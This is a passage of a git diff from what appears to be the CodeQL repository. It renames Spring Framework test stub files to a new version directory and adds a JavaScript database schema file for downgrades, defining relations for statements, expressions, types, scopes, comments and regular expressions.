a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/ContentCachingRequestWrapper.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/ContentCachingRequestWrapper.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/ContentCachingRequestWrapper.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/ContentCachingRequestWrapper.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/ContentCachingResponseWrapper.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/ContentCachingResponseWrapper.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/ContentCachingResponseWrapper.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/ContentCachingResponseWrapper.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/CookieGenerator.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/CookieGenerator.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/CookieGenerator.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/CookieGenerator.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/DefaultUriBuilderFactory.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/DefaultUriBuilderFactory.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/DefaultUriBuilderFactory.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/DefaultUriBuilderFactory.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/HtmlUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/HtmlUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/HtmlUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/HtmlUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/ServletContextPropertyUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/ServletContextPropertyUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/ServletContextPropertyUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/ServletContextPropertyUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/ServletRequestPathUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/ServletRequestPathUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/ServletRequestPathUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/ServletRequestPathUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriBuilder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriBuilder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriBuilder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriBuilder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriBuilderFactory.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriBuilderFactory.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriBuilderFactory.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriBuilderFactory.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriComponents.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriComponents.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriComponents.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriComponents.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriComponentsBuilder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriComponentsBuilder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriComponentsBuilder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriComponentsBuilder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriTemplate.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriTemplate.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriTemplate.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriTemplate.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriTemplateHandler.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriTemplateHandler.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriTemplateHandler.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriTemplateHandler.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UriUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UriUtils.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UrlPathHelper.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UrlPathHelper.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/UrlPathHelper.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/UrlPathHelper.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/WebUtils.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/WebUtils.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/web/util/WebUtils.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/web/util/WebUtils.java diff --git a/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/old.dbscheme b/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/old.dbscheme new file mode 100644 index 000000000000..5b5db607d20c --- /dev/null +++ b/javascript/downgrades/5b5db607d20c7b449cef2d1c926b24d77c69bebb/old.dbscheme @@ -0,0 +1,1193 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = @for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; +@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = @proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | @mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: @template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); +is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = @local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape +| 28 = @regexp_quoted_string +| 29 = @regexp_intersection +| 30 = @regexp_subtraction; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); 